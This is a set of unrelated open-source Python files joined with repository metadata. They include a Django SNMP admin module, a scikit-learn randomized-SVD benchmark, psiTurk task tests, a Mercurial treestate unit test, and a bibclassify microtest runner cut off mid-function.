for pair in paths:
splits = pair[0].split('/')
image = splits[-2]
param = splits[-1]
value = pair[1]
if image not in templates:
templates[image] = {}
templates[image][param] = value
return templates
| takus/dd-agent | utils/service_discovery/zookeeper_config_store.py | Python | bsd-3-clause | 3,661 | 0.001639 |
from django.contrib import admin
from .models import SnmpDevice, SnmpDeviceMessage, PingHistory
# Register your models here.
class SnmpDeviceAdmin(admin.ModelAdmin):
fields = [
'name', 'hostname', 'status', 'ping_mode', 'ping_port',
'snmp_template', 'snmp_port', 'snmp_community', 'snmp_system_contact',
'snmp_system_description', 'snmp_system_name', 'snmp_system_location',
'snmp_system_uptime','ping_last_seen', 'ping_last_tried',
'snmp_last_tried', 'snmp_last_poll', 'snmp_logged_on_users'
]
readonly_fields = (
'ping_last_seen', 'ping_last_tried', 'snmp_last_tried',
'snmp_last_poll'
)
list_display = [
'name', 'hostname', 'snmp_logged_on_users'
]
class SnmpDeviceMessageAdmin(admin.ModelAdmin):
fields = (
'snmp_device', 'status', 'message_choice', 'resolved', 'resolved_by'
)
class PingHistoryAdmin(admin.ModelAdmin):
fields = [
'snmp_device', 'online', 'timestamp'
]
readonly_fields = [
'timestamp',
]
list_display = [
'snmp_device', 'online', 'timestamp'
]
admin.site.register(SnmpDevice, SnmpDeviceAdmin)
admin.site.register(PingHistory, PingHistoryAdmin)
admin.site.register(SnmpDeviceMessage, SnmpDeviceMessageAdmin)
| MikaelSchultz/dofiloop-sentinel | sentinel/device/admin.py | Python | mit | 1,293 | 0.001547 |
"""
Benchmarks on the power iterations phase in randomized SVD.
We test on various synthetic and real datasets the effect of increasing
the number of power iterations in terms of quality of approximation
and running time. A number greater than 0 should help with noisy matrices,
which are characterized by a slow spectral decay.
We test several policy for normalizing the power iterations. Normalization
is crucial to avoid numerical issues.
The quality of the approximation is measured by the spectral norm discrepancy
between the original input matrix and the reconstructed one (by multiplying
the randomized_svd's outputs). The spectral norm is always equivalent to the
largest singular value of a matrix. (3) justifies this choice. However, one can
notice in these experiments that Frobenius and spectral norms behave
very similarly in a qualitative sense. Therefore, we suggest to run these
benchmarks with `enable_spectral_norm = False`, as Frobenius' is MUCH faster to
compute.
The benchmarks follow.
(a) plot: time vs norm, varying number of power iterations
data: many datasets
goal: compare normalization policies and study how the number of power
iterations affect time and norm
(b) plot: n_iter vs norm, varying rank of data and number of components for
randomized_SVD
data: low-rank matrices on which we control the rank
goal: study whether the rank of the matrix and the number of components
extracted by randomized SVD affect "the optimal" number of power iterations
(c) plot: time vs norm, varying datasets
data: many datasets
goal: compare default configurations
We compare the following algorithms:
- randomized_svd(..., power_iteration_normalizer='none')
- randomized_svd(..., power_iteration_normalizer='LU')
- randomized_svd(..., power_iteration_normalizer='QR')
- randomized_svd(..., power_iteration_normalizer='auto')
- fbpca.pca() from https://github.com/facebook/fbpca (if installed)
Conclusion
----------
- n_iter=2 appears to be a good default value
- power_iteration_normalizer='none' is OK if n_iter is small, otherwise LU
gives similar errors to QR but is cheaper. That's what 'auto' implements.
References
----------
(1) :arxiv:`"Finding structure with randomness:
Stochastic algorithms for constructing approximate matrix decompositions."
<0909.4061>`
Halko, et al., (2009)
(2) A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert
(3) An implementation of a randomized algorithm for principal component
analysis
A. Szlam et al. 2014
"""
# Author: Giorgio Patrini
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import gc
import pickle
from time import time
from collections import defaultdict
import os.path
from sklearn.utils._arpack import _init_arpack_v0
from sklearn.utils import gen_batches
from sklearn.utils.validation import check_random_state
from sklearn.utils.extmath import randomized_svd
from sklearn.datasets import make_low_rank_matrix, make_sparse_uncorrelated
from sklearn.datasets import (
fetch_lfw_people,
fetch_openml,
fetch_20newsgroups_vectorized,
fetch_olivetti_faces,
fetch_rcv1,
)
try:
import fbpca
fbpca_available = True
except ImportError:
fbpca_available = False
# If this is enabled, tests are much slower and will crash with the large data
enable_spectral_norm = False
# TODO: compute approximate spectral norms with the power method as in
# Estimating the largest eigenvalues by the power and Lanczos methods with
# a random start, Jacek Kuczynski and Henryk Wozniakowski, SIAM Journal on
# Matrix Analysis and Applications, 13 (4): 1094-1122, 1992.
# This approximation is a very fast estimate of the spectral norm, but depends
# on starting random vectors.
# Determine when to switch to batch computation for matrix norms,
# in case the reconstructed (dense) matrix is too large
MAX_MEMORY = int(2e9)
# The following datasets can be downloaded manually from:
# CIFAR 10: https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz
# SVHN: http://ufldl.stanford.edu/housenumbers/train_32x32.mat
CIFAR_FOLDER = "./cifar-10-batches-py/"
SVHN_FOLDER = "./SVHN/"
datasets = [
"low rank matrix",
"lfw_people",
"olivetti_faces",
"20newsgroups",
"mnist_784",
"CIFAR",
"a3a",
"SVHN",
"uncorrelated matrix",
]
big_sparse_datasets = ["big sparse matrix", "rcv1"]
def unpickle(file_name):
with open(file_name, "rb") as fo:
return pickle.load(fo, encoding="latin1")["data"]
def handle_missing_dataset(file_folder):
if not os.path.isdir(file_folder):
print("%s file folder not found. Test skipped." % file_folder)
return 0
def get_data(dataset_name):
print("Getting dataset: %s" % dataset_name)
if dataset_name == "lfw_people":
X = fetch_lfw_people().data
elif dataset_name == "20newsgroups":
X = fetch_20newsgroups_vectorized().data[:, :100000]
elif dataset_name == "olivetti_faces":
X = fetch_olivetti_faces().data
elif dataset_name == "rcv1":
X = fetch_rcv1().data
elif dataset_name == "CIFAR":
if handle_missing_dataset(CIFAR_FOLDER) == "skip":
return
X1 = [unpickle("%sdata_batch_%d" % (CIFAR_FOLDER, i + 1)) for i in range(5)]
X = np.vstack(X1)
del X1
elif dataset_name == "SVHN":
if handle_missing_dataset(SVHN_FOLDER) == 0:
return
X1 = sp.io.loadmat("%strain_32x32.mat" % SVHN_FOLDER)["X"]
X2 = [X1[:, :, :, i].reshape(32 * 32 * 3) for i in range(X1.shape[3])]
X = np.vstack(X2)
del X1
del X2
elif dataset_name == "low rank matrix":
X = make_low_rank_matrix(
n_samples=500,
n_features=int(1e4),
effective_rank=100,
tail_strength=0.5,
random_state=random_state,
)
elif dataset_name == "uncorrelated matrix":
X, _ = make_sparse_uncorrelated(
n_samples=500, n_features=10000, random_state=random_state
)
elif dataset_name == "big sparse matrix":
sparsity = int(1e6)
size = int(1e6)
small_size = int(1e4)
data = np.random.normal(0, 1, int(sparsity / 10))
data = np.repeat(data, 10)
row = np.random.uniform(0, small_size, sparsity)
col = np.random.uniform(0, small_size, sparsity)
X = sp.sparse.csr_matrix((data, (row, col)), shape=(size, small_size))
del data
del row
del col
else:
X = fetch_openml(dataset_name).data
return X
def plot_time_vs_s(time, norm, point_labels, title):
plt.figure()
colors = ["g", "b", "y"]
for i, l in enumerate(sorted(norm.keys())):
if l != "fbpca":
plt.plot(time[l], norm[l], label=l, marker="o", c=colors.pop())
else:
plt.plot(time[l], norm[l], label=l, marker="^", c="red")
for label, x, y in zip(point_labels, list(time[l]), list(norm[l])):
plt.annotate(
label,
xy=(x, y),
xytext=(0, -20),
textcoords="offset points",
ha="right",
va="bottom",
)
plt.legend(loc="upper right")
plt.suptitle(title)
plt.ylabel("norm discrepancy")
plt.xlabel("running time [s]")
def scatter_time_vs_s(time, norm, point_labels, title):
plt.figure()
size = 100
for i, l in enumerate(sorted(norm.keys())):
if l != "fbpca":
plt.scatter(time[l], norm[l], label=l, marker="o", c="b", s=size)
for label, x, y in zip(point_labels, list(time[l]), list(norm[l])):
plt.annotate(
label,
xy=(x, y),
xytext=(0, -80),
textcoords="offset points",
ha="right",
arrowprops=dict(arrowstyle="->", connectionstyle="arc3"),
va="bottom",
size=11,
rotation=90,
)
else:
plt.scatter(time[l], norm[l], label=l, marker="^", c="red", s=size)
for label, x, y in zip(point_labels, list(time[l]), list(norm[l])):
plt.annotate(
label,
xy=(x, y),
xytext=(0, 30),
textcoords="offset points",
ha="right",
arrowprops=dict(arrowstyle="->", connectionstyle="arc3"),
va="bottom",
size=11,
rotation=90,
)
plt.legend(loc="best")
plt.suptitle(title)
plt.ylabel("norm discrepancy")
plt.xlabel("running time [s]")
def plot_power_iter_vs_s(power_iter, s, title):
plt.figure()
for l in sorted(s.keys()):
plt.plot(power_iter, s[l], label=l, marker="o")
plt.legend(loc="lower right", prop={"size": 10})
plt.suptitle(title)
plt.ylabel("norm discrepancy")
plt.xlabel("n_iter")
def svd_timing(
X, n_comps, n_iter, n_oversamples, power_iteration_normalizer="auto", method=None
):
"""
Measure time for decomposition
"""
print("... running SVD ...")
if method != "fbpca":
gc.collect()
t0 = time()
U, mu, V = randomized_svd(
X,
n_comps,
n_oversamples,
n_iter,
power_iteration_normalizer,
random_state=random_state,
transpose=False,
)
call_time = time() - t0
else:
gc.collect()
t0 = time()
# There is a different convention for l here
U, mu, V = fbpca.pca(
X, n_comps, raw=True, n_iter=n_iter, l=n_oversamples + n_comps
)
call_time = time() - t0
return U, mu, V, call_time
def norm_diff(A, norm=2, msg=True, random_state=None):
"""
Compute the norm diff with the original matrix, when randomized
SVD is called with *params.
norm: 2 => spectral; 'fro' => Frobenius
"""
if msg:
print("... computing %s norm ..." % norm)
if norm == 2:
# s = sp.linalg.norm(A, ord=2) # slow
v0 = _init_arpack_v0(min(A.shape), random_state)
value = sp.sparse.linalg.svds(A, k=1, return_singular_vectors=False, v0=v0)
else:
if sp.sparse.issparse(A):
value = sp.sparse.linalg.norm(A, ord=norm)
else:
value = sp.linalg.norm(A, ord=norm)
return value
def scalable_frobenius_norm_discrepancy(X, U, s, V):
# if the input is not too big, just call scipy
if X.shape[0] * X.shape[1] < MAX_MEMORY:
A = X - U.dot(np.diag(s).dot(V))
return norm_diff(A, norm="fro")
print("... computing fro norm by batches...")
batch_size = 1000
Vhat = np.diag(s).dot(V)
cum_norm = 0.0
for batch in gen_batches(X.shape[0], batch_size):
M = X[batch, :] - U[batch, :].dot(Vhat)
cum_norm += norm_diff(M, norm="fro", msg=False)
return np.sqrt(cum_norm)
def bench_a(X, dataset_name, power_iter, n_oversamples, n_comps):
all_time = defaultdict(list)
if enable_spectral_norm:
all_spectral = defaultdict(list)
X_spectral_norm = norm_diff(X, norm=2, msg=False, random_state=0)
all_frobenius = defaultdict(list)
X_fro_norm = norm_diff(X, norm="fro", msg=False)
for pi in power_iter:
for pm in ["none", "LU", "QR"]:
print("n_iter = %d on sklearn - %s" % (pi, pm))
U, s, V, time = svd_timing(
X,
n_comps,
n_iter=pi,
power_iteration_normalizer=pm,
n_oversamples=n_oversamples,
)
label = "sklearn - %s" % pm
all_time[label].append(time)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if fbpca_available:
print("n_iter = %d on fbca" % (pi))
U, s, V, time = svd_timing(
X,
n_comps,
n_iter=pi,
power_iteration_normalizer=pm,
n_oversamples=n_oversamples,
method="fbpca",
)
label = "fbpca"
all_time[label].append(time)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if enable_spectral_norm:
title = "%s: spectral norm diff vs running time" % (dataset_name)
plot_time_vs_s(all_time, all_spectral, power_iter, title)
title = "%s: Frobenius norm diff vs running time" % (dataset_name)
plot_time_vs_s(all_time, all_frobenius, power_iter, title)
def bench_b(power_list):
n_samples, n_features = 1000, 10000
data_params = {
"n_samples": n_samples,
"n_features": n_features,
"tail_strength": 0.7,
"random_state": random_state,
}
dataset_name = "low rank matrix %d x %d" % (n_samples, n_features)
ranks = [10, 50, 100]
if enable_spectral_norm:
all_spectral = defaultdict(list)
all_frobenius = defaultdict(list)
for rank in ranks:
X = make_low_rank_matrix(effective_rank=rank, **data_params)
if enable_spectral_norm:
X_spectral_norm = norm_diff(X, norm=2, msg=False, random_state=0)
X_fro_norm = norm_diff(X, norm="fro", msg=False)
for n_comp in [int(rank / 2), rank, rank * 2]:
label = "rank=%d, n_comp=%d" % (rank, n_comp)
print(label)
for pi in power_list:
U, s, V, _ = svd_timing(
X,
n_comp,
n_iter=pi,
n_oversamples=2,
power_iteration_normalizer="LU",
)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if enable_spectral_norm:
title = "%s: spectral norm diff vs n power iteration" % (dataset_name)
plot_power_iter_vs_s(power_iter, all_spectral, title)
title = "%s: Frobenius norm diff vs n power iteration" % (dataset_name)
plot_power_iter_vs_s(power_iter, all_frobenius, title)
def bench_c(datasets, n_comps):
all_time = defaultdict(list)
if enable_spectral_norm:
all_spectral = defaultdict(list)
all_frobenius = defaultdict(list)
for dataset_name in datasets:
X = get_data(dataset_name)
if X is None:
continue
if enable_spectral_norm:
X_spectral_norm = norm_diff(X, norm=2, msg=False, random_state=0)
X_fro_norm = norm_diff(X, norm="fro", msg=False)
n_comps = np.minimum(n_comps, np.min(X.shape))
label = "sklearn"
print("%s %d x %d - %s" % (dataset_name, X.shape[0], X.shape[1], label))
U, s, V, time = svd_timing(X, n_comps, n_iter=2, n_oversamples=10, method=label)
all_time[label].append(time)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if fbpca_available:
label = "fbpca"
print("%s %d x %d - %s" % (dataset_name, X.shape[0], X.shape[1], label))
U, s, V, time = svd_timing(
X, n_comps, n_iter=2, n_oversamples=2, method=label
)
all_time[label].append(time)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if len(all_time) == 0:
raise ValueError("No tests ran. Aborting.")
if enable_spectral_norm:
title = "normalized spectral norm diff vs running time"
scatter_time_vs_s(all_time, all_spectral, datasets, title)
title = "normalized Frobenius norm diff vs running time"
scatter_time_vs_s(all_time, all_frobenius, datasets, title)
if __name__ == "__main__":
random_state = check_random_state(1234)
power_iter = np.linspace(0, 6, 7, dtype=int)
n_comps = 50
for dataset_name in datasets:
X = get_data(dataset_name)
if X is None:
continue
print(
" >>>>>> Benching sklearn and fbpca on %s %d x %d"
% (dataset_name, X.shape[0], X.shape[1])
)
bench_a(
X,
dataset_name,
power_iter,
n_oversamples=2,
n_comps=np.minimum(n_comps, np.min(X.shape)),
)
print(" >>>>>> Benching on simulated low rank matrix with variable rank")
bench_b(power_iter)
print(" >>>>>> Benching sklearn and fbpca default configurations")
bench_c(datasets + big_sparse_datasets, n_comps)
plt.show()
| manhhomienbienthuy/scikit-learn | benchmarks/bench_plot_randomized_svd.py | Python | bsd-3-clause | 17,938 | 0.000557 |
import pytest
CODEVERSION = '0.0.1'
NEW_CODEVERSION = '0.0.2'
@pytest.fixture()
def campaign():
from psiturk.models import Campaign
parameters = {
'codeversion': CODEVERSION,
'mode': 'sandbox',
'goal': 100,
'minutes_between_rounds': 1,
'assignments_per_round': 10,
'hit_reward': 1.00,
'hit_duration_hours': 1,
}
new_campaign = Campaign(**parameters)
from psiturk.db import db_session
db_session.add(new_campaign)
db_session.commit()
return new_campaign
def test_campaign_round_codeversion_change_cancel(patch_aws_services, campaign, mocker, caplog):
from psiturk.tasks import do_campaign_round
campaign_args = {
'campaign': campaign,
'job_id': campaign.campaign_job_id
}
from psiturk.experiment import app
mocker.patch.object(app.apscheduler,
'remove_job', lambda *args, **kwargs: True)
from psiturk.amt_services_wrapper import MTurkServicesWrapper
aws_services_wrapper = MTurkServicesWrapper()
aws_services_wrapper.config['Task Parameters']['experiment_code_version'] = NEW_CODEVERSION
import psiturk.tasks
mocker.patch.object(psiturk.tasks.TaskUtils, 'aws_services_wrapper', aws_services_wrapper)
import psiturk.experiment
remove_job_mock = mocker.patch.object(psiturk.experiment.app.apscheduler, 'remove_job')
do_campaign_round(**campaign_args)
remove_job_mock.assert_called()
def test_campaign_goal_met_cancel(patch_aws_services, campaign, mocker, caplog, stubber):
from psiturk.tasks import do_campaign_round
campaign_args = {
'campaign': campaign,
'job_id': campaign.campaign_job_id
}
from psiturk.experiment import app
mocker.patch.object(app.apscheduler,
'remove_job', lambda *args, **kwargs: True)
import psiturk.tasks
mocker.patch.object(psiturk.models.Participant, 'count_completed', lambda *args, **kwargs: campaign.goal)
import psiturk.experiment
remove_job_mock = mocker.patch.object(psiturk.experiment.app.apscheduler, 'remove_job')
do_campaign_round(**campaign_args)
remove_job_mock.assert_called()
assert not campaign.is_active
def test_campaign_posts_hits(patch_aws_services, stubber, campaign, mocker, caplog):
from psiturk.amt_services_wrapper import MTurkServicesWrapper
aws_services_wrapper = MTurkServicesWrapper()
import psiturk.tasks
mocker.patch.object(psiturk.tasks.TaskUtils, 'aws_services_wrapper', aws_services_wrapper)
mocked_create_hit = mocker.patch.object(aws_services_wrapper, 'create_hit')
campaign_args = {
'campaign': campaign,
'job_id': campaign.campaign_job_id
}
from psiturk.tasks import do_campaign_round
do_campaign_round(**campaign_args)
assert mocked_create_hit.call_count == 2
mocked_create_hit.assert_any_call(num_workers=9, reward=campaign.hit_reward, duration=campaign.hit_duration_hours)
mocked_create_hit.assert_any_call(num_workers=1, reward=campaign.hit_reward, duration=campaign.hit_duration_hours)
def test_task_approve_all(patch_aws_services, stubber, mocker, caplog):
from psiturk.amt_services_wrapper import MTurkServicesWrapper
aws_services_wrapper = MTurkServicesWrapper()
import psiturk.tasks
mocker.patch.object(psiturk.tasks.TaskUtils, 'aws_services_wrapper', aws_services_wrapper)
mocked_approve_all = mocker.patch.object(aws_services_wrapper, 'approve_all_assignments')
from psiturk.tasks import do_approve_all
do_approve_all('sandbox')
mocked_approve_all.assert_called_once()
| NYUCCL/psiTurk | tests/test_tasks.py | Python | mit | 3,640 | 0.003571 |
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
from __future__ import absolute_import
import itertools
import os
import posixpath
import random
import tempfile
import unittest
import silenttestrunner
from bindings import treestate
from edenscm.mercurial import pycompat
from hghave import require
testtmp = os.getenv("TESTTMP") or tempfile.mkdtemp("test-treestate")
def randname():
length = random.randint(1, 4)
return "".join(random.sample("abcdef", 1)[0] for i in range(length))
def randpath(path=""):
# pop components from path
for i in range(1 + random.randrange(path.count("/") + 1)):
path = os.path.dirname(path)
# push new components to path
maxlevel = 4
for i in range(1 + random.randrange(max([1, maxlevel - path.count("/")]))):
path = posixpath.join(path, randname())
if not path:
path = randname()
return path
def genpaths():
"""generate random paths"""
path = ""
while True:
nextpath = randpath(path)
yield nextpath
path = nextpath
def genfiles():
"""generate random tuple of (path, bits, mode, size, mtime, copied)"""
pathgen = genpaths()
while True:
path = next(pathgen)
bits = 0
mode = random.randint(0, 0o777)
size = random.randint(0, 1 << 31)
mtime = random.randint(-1, 1 << 31)
copied = None
# bits (StateFlags)
for bit in [
treestate.EXIST_P1,
treestate.EXIST_P2,
treestate.EXIST_NEXT,
treestate.IGNORED,
treestate.NEED_CHECK,
]:
if random.randint(0, 1):
bits |= bit
if random.randint(0, 1):
bits |= treestate.COPIED
copied = next(pathgen)
yield (path, bits, mode, size, mtime, copied)
class testtreestate(unittest.TestCase):
def testempty(self):
tree = treestate.treestate(os.path.join(testtmp, "empty"), 0)
self.assertEqual(len(tree), 0)
self.assertEqual(tree.getmetadata(), b"")
self.assertEqual(tree.walk(0, 0), [])
self.assertTrue(tree.hasdir("/"))
for path in ["", "a", "/", "b/c", "d/"]:
self.assertFalse(path in tree)
if path and path != "/":
self.assertFalse(tree.hasdir(path))
if path != "/":
if path.endswith("/"):
self.assertIsNone(tree.getdir(path))
else:
self.assertIsNone(tree.get(path, None))
def testinsert(self):
tree = treestate.treestate(os.path.join(testtmp, "insert"), 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
expected[path] = (bits, mode, size, mtime, copied)
self.assertEqual(len(tree), len(expected))
for path in tree.walk(0, 0):
self.assertTrue(tree.hasdir(os.path.dirname(path) + "/"))
self.assertEqual(tree.get(path, None), expected[path])
def testremove(self):
tree = treestate.treestate(os.path.join(testtmp, "remove"), 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
if (mtime & 1) == 0:
tree.remove(path)
if path in expected:
del expected[path]
else:
expected[path] = (bits, mode, size, mtime, copied)
self.assertEqual(len(tree), len(expected))
for path in tree.walk(0, 0):
self.assertTrue(tree.hasdir(os.path.dirname(path) + "/"))
self.assertEqual(tree.get(path, None), expected[path])
def testwalk(self):
treepath = os.path.join(testtmp, "walk")
tree = treestate.treestate(treepath, 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
expected[path] = (bits, mode, size, mtime, copied)
def walk(setbits, unsetbits):
return sorted(
k
for k, v in pycompat.iteritems(expected)
if ((v[0] & unsetbits) == 0 and (v[0] & setbits) == setbits)
)
def check(setbits, unsetbits):
self.assertEqual(
walk(setbits, unsetbits), sorted(tree.walk(setbits, unsetbits))
)
for i in ["in-memory", "flushed"]:
for bit in [treestate.IGNORED, treestate.COPIED]:
check(0, bit)
check(bit, 0)
check(treestate.EXIST_P1, treestate.EXIST_P2)
rootid = tree.flush()
tree = treestate.treestate(treepath, rootid)
def testdirfilter(self):
treepath = os.path.join(testtmp, "walk")
tree = treestate.treestate(treepath, 0)
files = ["a/b", "a/b/c", "b/c", "c/d"]
for path in files:
tree.insert(path, 1, 2, 3, 4, None)
self.assertEqual(tree.walk(1, 0, None), files)
self.assertEqual(
tree.walk(1, 0, lambda dir: dir in {"a/b/", "c/"}), ["a/b", "b/c"]
)
self.assertEqual(tree.walk(1, 0, lambda dir: True), [])
def testflush(self):
treepath = os.path.join(testtmp, "flush")
tree = treestate.treestate(treepath, 0)
tree.insert("a", 1, 2, 3, 4, None)
tree.setmetadata(b"1")
rootid1 = tree.flush()
tree.remove("a")
tree.insert("b", 1, 2, 3, 4, None)
tree.setmetadata(b"2")
rootid2 = tree.flush()
tree = treestate.treestate(treepath, rootid1)
self.assertTrue("a" in tree)
self.assertFalse("b" in tree)
self.assertEqual(tree.getmetadata(), b"1")
tree = treestate.treestate(treepath, rootid2)
self.assertFalse("a" in tree)
self.assertTrue("b" in tree)
self.assertEqual(tree.getmetadata(), b"2")
def testsaveas(self):
treepath = os.path.join(testtmp, "saveas")
tree = treestate.treestate(treepath, 0)
tree.insert("a", 1, 2, 3, 4, None)
tree.setmetadata(b"1")
tree.flush()
tree.insert("b", 1, 2, 3, 4, None)
tree.remove("a")
treepath = "%s-savedas" % treepath
tree.setmetadata(b"2")
rootid = tree.saveas(treepath)
tree = treestate.treestate(treepath, rootid)
self.assertFalse("a" in tree)
self.assertTrue("b" in tree)
self.assertEqual(tree.getmetadata(), b"2")
def testfiltered(self):
treepath = os.path.join(testtmp, "filtered")
tree = treestate.treestate(treepath, 0)
tree.insert("a/B/c", 1, 2, 3, 4, None)
filtered = tree.getfiltered("A/B/C", lambda x: x.upper(), 1)
self.assertEqual(filtered, ["a/B/c"])
filtered = tree.getfiltered("A/B/C", lambda x: x, 2)
self.assertEqual(filtered, [])
def testpathcomplete(self):
treepath = os.path.join(testtmp, "pathcomplete")
tree = treestate.treestate(treepath, 0)
paths = ["a/b/c", "a/b/d", "a/c", "de"]
for path in paths:
tree.insert(path, 1, 2, 3, 4, None)
def complete(prefix, fullpath=False):
completed = []
tree.pathcomplete(prefix, 0, 0, completed.append, fullpath)
return completed
self.assertEqual(complete(""), ["a/", "de"])
self.assertEqual(complete("d"), ["de"])
self.assertEqual(complete("a/"), ["a/b/", "a/c"])
self.assertEqual(complete("a/b/"), ["a/b/c", "a/b/d"])
self.assertEqual(complete("a/b/c"), ["a/b/c"])
self.assertEqual(complete("", True), paths)
def testgetdir(self):
treepath = os.path.join(testtmp, "filtered")
tree = treestate.treestate(treepath, 0)
tree.insert("a/b/c", 3, 0, 0, 0, None)
tree.insert("a/d", 5, 0, 0, 0, None)
self.assertEqual(tree.getdir("/"), (3 | 5, 3 & 5))
self.assertEqual(tree.getdir("a/"), (3 | 5, 3 & 5))
self.assertEqual(tree.getdir("a/b/"), (3, 3))
self.assertIsNone(tree.getdir("a/b/c/"))
tree.insert("a/e/f", 10, 0, 0, 0, None)
self.assertEqual(tree.getdir("a/"), (3 | 5 | 10, 3 & 5 & 10))
tree.remove("a/e/f")
self.assertEqual(tree.getdir("a/"), (3 | 5, 3 & 5))
def testsubdirquery(self):
treepath = os.path.join(testtmp, "subdir")
tree = treestate.treestate(treepath, 0)
paths = ["a/b/c", "a/b/d", "a/c", "de"]
for path in paths:
tree.insert(path, 1, 2, 3, 4, None)
self.assertEqual(tree.tracked(""), paths)
self.assertEqual(tree.tracked("de"), ["de"])
self.assertEqual(tree.tracked("a"), [])
self.assertEqual(tree.tracked("a/"), ["a/b/c", "a/b/d", "a/c"])
self.assertEqual(tree.tracked("a/b/"), ["a/b/c", "a/b/d"])
self.assertEqual(tree.tracked("a/b"), [])
self.assertEqual(tree.tracked("a/c/"), [])
self.assertEqual(tree.tracked("a/c"), ["a/c"])
if __name__ == "__main__":
silenttestrunner.main(__name__)
| facebookexperimental/eden | eden/scm/tests/test-treestate.py | Python | gpl-2.0 | 9,519 | 0 |
# -*- coding: utf-8 -*-
"""Module for running microtests on how well the extraction works -
this module is STANDALONE safe"""
import ConfigParser
import glob
import traceback
import codecs
import bibclassify_config as bconfig
import bibclassify_engine as engine
log = bconfig.get_logger("bibclassify.microtest")
def run(glob_patterns,
verbose=20,
plevel = 1
):
"""Execute microtests"""
if verbose is not None:
log.setLevel(int(verbose))
results = {}
for pattern in glob_patterns:
log.info("Looking for microtests: %s" % pattern)
for cfgfile in glob.glob(pattern):
log.debug("processing: %s" % (cfgfile))
try:
test_cases = load_microtest_definition(cfgfile)
run_microtest_suite(test_cases, results=results, plevel=plevel)
except Exception, msg:
log.error('Error running microtest: %s' % cfgfile)
log.error(msg)
log.error(traceback.format_exc())
summarize_results(results, plevel)
def run_microtest_suite(test_cases, results={}, plevel=1):
"""Runs all tests from the test_case
@var test_cases: microtest definitions
@keyword results: dict, where results are cummulated
@keyword plevel: int [0..1], performance level, results
below the plevel are considered unsuccessful
@return: nothing
"""
config = {}
if 'config' in test_cases:
config = test_cases['config']
del(test_cases['config'])
if 'taxonomy' not in config:
config['taxonomy'] = ['HEP']
for test_name in sorted(test_cases.keys()):
test = test_cases[test_name]
try:
log.debug('section: %s' % test_name)
phrase = test['phrase'][0]
(skw, ckw, akw, acr) = engine.get_keywords_from_text(test['phrase'], config['taxonomy'][0], output_mode="raw")
details = analyze_results(test, (skw, ckw) )
if details["plevel"] < plevel:
log.error("\n" + format_test_case(test))
log.error("results\n" + format_details(details))
else:
log.info("Success for section: %s" % (test_name))
log.info("\n" + format_test_case(test))
if plevel != 1:
log.info("results\n" + format_details(details))
results.setdefault(test_name, [])
results[test_name].append(details)
except Exception, msg:
log.error('Operational error executing section: %s' % test_name)
#log.error(msg)
log.error(traceback.format_exc())
def summarize_results(results, plevel):
total = 0
success = 0
for k,v in results.items():
total += len(v)
success += len(filter(lambda x: x["plevel"] >= plevel, v))
log.info("Total number of micro-tests run: %s" % total)
log.info("Success/failure: %d/%d" % (success, total-success))
def format_details(details):
plevel = details["plevel"]
details["plevel"] = [plevel]
out = format_test_case(details)
details["plevel"] = plevel
return out
def format_test_case(test_case):
padding = 13
keys = ["phrase", "expected", "unwanted"]
out = ["" for x in range(len(keys))]
out2 = []
for key in test_case.keys():
phrase = "\n".join(map(lambda x: (" " * (padding + 1) ) + str(x), test_case[key]))
if key in keys:
out[keys.index(key)] = "%s=%s" % (key.rjust(padding-1), phrase[padding:])
else:
out2.append("%s=%s" % (key.rjust(padding-1), phrase[padding:]))
if filter(len, out) and filter(len, out2):
return "%s\n%s" % ("\n".join(filter(len, out)), "\n".join(out2))
else:
return "%s%s" % ("\n".join(filter(len, out)), "\n".join(out2))
def analyze_results(test_case, results):
skw = results[0]
ckw = results[1]
details = {"correct" : [], "incorrect": [],
"plevel" : 0}
responses_total = len(skw) + len(ckw)
expected_total = len(test_case["expected"])
correct_responses = 0
incorrect_responses = 0
for result_set in (skw, ckw):
for r in result_set:
try:
val = r[0].output()
except:
val = r.output()
if r in test_case["expected"]:
correct_responses += 1
details["correct"].append(val)
else:
incorrect_responses += 1
details["incorrect"].append(val)
details["plevel"] = ((responses_total + expected_total) - incorrect_responses) / (responses_total + expected_total)
return details
def load_microtest_definition(cfgfile, **kwargs):
"""Loads data from the microtest definition file
{
section-1:
phrase: [ some-string]
expected: [some, string]
unwanted: [some-string]
section-2:
.....
}
"""
config = {}
cfg = ConfigParser.ConfigParser()
fo = codecs.open(cfgfile, 'r', 'utf-8')
cfg.readfp(fo, filename=cfgfile)
for s in cfg.sections():
if s in config:
log.error('two sections with the same name')
config[s] = {}
for k, v in cfg.items(s):
if "\n" in v:
v = filter(len, v.splitlines())
else:
v = [v.strip()]
